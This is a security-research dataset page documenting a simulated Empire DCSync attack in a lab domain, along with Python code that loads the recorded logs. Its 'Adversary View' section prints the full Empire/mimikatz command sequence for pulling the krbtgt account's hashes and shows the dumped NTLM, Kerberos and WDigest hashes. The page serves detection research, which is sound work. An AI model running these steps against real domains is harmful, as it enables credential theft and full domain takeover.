Contents

Empire DCSync

Contents

Empire DCSync#

Metadata#


Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2019/03/01
Modification Date	2020/09/20
Tactics	TA0006
Techniques	T1003.006
Tags	AD Replication services,RPC DRSUAPI DsGetNCChanges

Dataset Description#

This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.

Datasets Downloads#

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip
Network	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip

Simulation Metadata#

Tools#

type	Name	Module
C2	Empire	DCSync

Adversary View#

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            
1EHYPBVC ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7456   5/0.0    2020-09-21 22:56:58  http            

(Empire: agents) > interact 1EHYPBVC
(Empire: 1EHYPBVC) > 
(Empire: 1EHYPBVC) > usemodule credentials/mimikatz/dcsync
(Empire: powershell/credentials/mimikatz/dcsync) > set user krbtgt
(Empire: powershell/credentials/mimikatz/dcsync) > set domain theshire.local
(Empire: powershell/credentials/mimikatz/dcsync) > set dc MORDORDC.theshire.local
(Empire: powershell/credentials/mimikatz/dcsync) > info

              Name: Invoke-Mimikatz DCsync
            Module: powershell/credentials/mimikatz/dcsync
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @gentilkiwi
  Vincent Le Toux
  @JosephBialek

Description:
  Runs PowerSploit's Invoke-Mimikatz function to extract a
  given account password through Mimikatz's lsadump::dcsync
  module. This doesn't need code execution on a given DC, but
  needs to be run from a user context with DA equivalent
  privileges.

Comments:
  http://blog.gentilkiwi.com http://clymb3r.wordpress.com/

Options:

  Name   Required    Value                     Description
  ----   --------    -------                   -----------
  Agent  True        1EHYPBVC                  Agent to run module on.                 
  user   True        krbtgt                    Username to extract the hash for        
                                              (domain\username format).               
  domain False       theshire.local            Specified (fqdn) domain to pull for the 
                                              primary domain/DC.                      
  dc     False       MORDORDC.theshire.local   Specified (fqdn) domain controller to   
                                              pull replication data from.             

(Empire: powershell/credentials/mimikatz/dcsync) > execute
[*] Tasked 1EHYPBVC to run TASK_CMD_JOB
[*] Agent 1EHYPBVC tasked with task ID 1
[*] Tasked agent 1EHYPBVC to run module powershell/credentials/mimikatz/dcsync
(Empire: powershell/credentials/mimikatz/dcsync) > 
Job started: 5PKMSU

Hostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /user:krbtgt /domain:theshire.local /dc:MORDORDC.theshire.local
[DC] 'theshire.local' will be the domain
[DC] 'MORDORDC.theshire.local' will be the DC server
[DC] 'krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 9/17/2020 11:14:46 AM
Object Security ID   : S-1-5-21-4228717743-1032521047-1810997296-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: c2547afe54ff225a546c48805714d000
    ntlm- 0: c2547afe54ff225a546c48805714d000
    lm  - 0: 376c6c28a8cfd97055be910640a24428

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : a69dcd105b2fc3955a3f52ca00a26902

* Primary:Kerberos-Newer-Keys *
    Default Salt : THESHIRE.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 2954d183aaca51936dea10ea187e198814fa57b136733ca167b5d3fcc5b6ab2a
      aes128_hmac       (4096) : a8811f9942540c8f10c3837a6975d446
      des_cbc_md5       (4096) : e36d674cc7c8b983

* Primary:Kerberos *
    Default Salt : THESHIRE.LOCALkrbtgt
    Credentials
      des_cbc_md5       : e36d674cc7c8b983

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  774cc07151941eb115c0fd700fa5715b
    02  6a75ae70376df6a3a3e23f560890ac90
    03  cd5fa9ee1e6ab120cd6edb6970f56f38
    04  774cc07151941eb115c0fd700fa5715b
    05  6a75ae70376df6a3a3e23f560890ac90
    06  168d6e12549fcbfa3931ffe79e6a978f
    07  774cc07151941eb115c0fd700fa5715b
    08  c2fc61fda20bbacb17fb29b10d7b8144
    09  c2fc61fda20bbacb17fb29b10d7b8144
    10  2985ad74f9f6f53e7533662687998542
    11  4f58b2e2f9e8505a4b364b5c7bb0f0c5
    12  c2fc61fda20bbacb17fb29b10d7b8144
    13  61c34cf9f0bb6f8062250ffff84cda07
    14  4f58b2e2f9e8505a4b364b5c7bb0f0c5
    15  8a1d00b5e9c900715124c0998c19b909
    16  8a1d00b5e9c900715124c0998c19b909
    17  da88e05b3fe5adc93f5838eb33fadb98
    18  45d131a894f854b5400167647aa5ae0f
    19  2a1e106ba660636a95def3aad248ca6c
    20  c05fa8a38b50e8c9088d3a64a7659817
    21  28c03b871631ef39fc8cbc7fbb8e52e8
    22  28c03b871631ef39fc8cbc7fbb8e52e8
    23  5e1dceb9c5260211633323b398af827d
    24  e3b40de14a439d9c18c57cc60002c5f5
    25  e3b40de14a439d9c18c57cc60002c5f5
    26  e52cde43b834f641f9f80190b29064a7
    27  3b2e4b4ad448b19043d422dc9bf4fadc
    28  0c45e5c4ef958888593d806c650f0e3d
    29  1822249537162bad7b9808ae6b51c627

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)

References#

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md#atomic-test-1—pad-binary-to-change-hash—linuxmacos-dd